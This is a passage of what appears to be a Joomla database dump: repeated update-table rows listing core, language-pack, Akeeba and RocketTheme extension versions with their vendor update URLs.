AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6738,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6739,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6740,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6741,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6742,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6743,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(6744,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(6745,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(6746,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6747,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6748,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6749,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6750,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6751,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6752,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6753,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6754,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6755,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6756,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6757,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6758,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6759,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6760,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6761,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6762,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6763,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6764,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6765,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6766,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6767,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6768,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6769,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6770,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6771,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(6772,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6773,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6774,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6775,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6776,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6777,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6778,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6779,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6780,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6781,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6782,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6783,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6784,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6785,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6786,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6787,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6788,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6789,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6790,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6791,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6792,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6793,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6794,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6795,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6796,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6797,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6798,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6799,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6800,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6801,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6802,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6803,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(6804,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(6805,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(6806,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(6807,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(6808,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(6809,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6810,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6811,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6812,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6813,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6814,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6815,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6816,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6817,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6818,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6819,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6820,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6821,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6822,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6823,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6824,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(6825,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6826,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6827,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6828,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6829,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6830,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6831,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6832,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6833,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6834,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6835,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6836,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6837,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6838,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6839,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6840,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6841,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6842,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6843,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6844,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6845,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6846,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6847,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6848,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6849,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6850,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6851,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6852,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6853,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6854,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6855,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6856,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(6857,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(6858,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(6859,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6860,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6861,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6862,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6863,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6864,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6865,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6866,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6867,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6868,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6869,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6870,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6871,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6872,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6873,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6874,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6875,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6876,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6877,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6878,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6879,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6880,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6881,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6882,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(6883,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6884,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6885,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6886,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6887,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6888,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6889,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6890,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6891,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6892,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6893,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6894,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6895,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6896,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6897,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6898,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6899,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6900,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6901,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6902,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6903,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6904,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6905,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6906,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6907,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6908,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6909,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6910,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6911,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6912,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6913,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6914,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(6915,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(6916,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(6917,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(6918,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(6919,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(6920,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6921,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6922,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6923,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6924,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6925,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6926,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6927,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6928,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6929,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6930,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6931,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6932,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6933,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6934,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6935,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(6936,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6937,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6938,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6939,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6940,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6941,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6942,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6943,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6944,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6945,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6946,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6947,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6948,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6949,57,0,'Portuguese 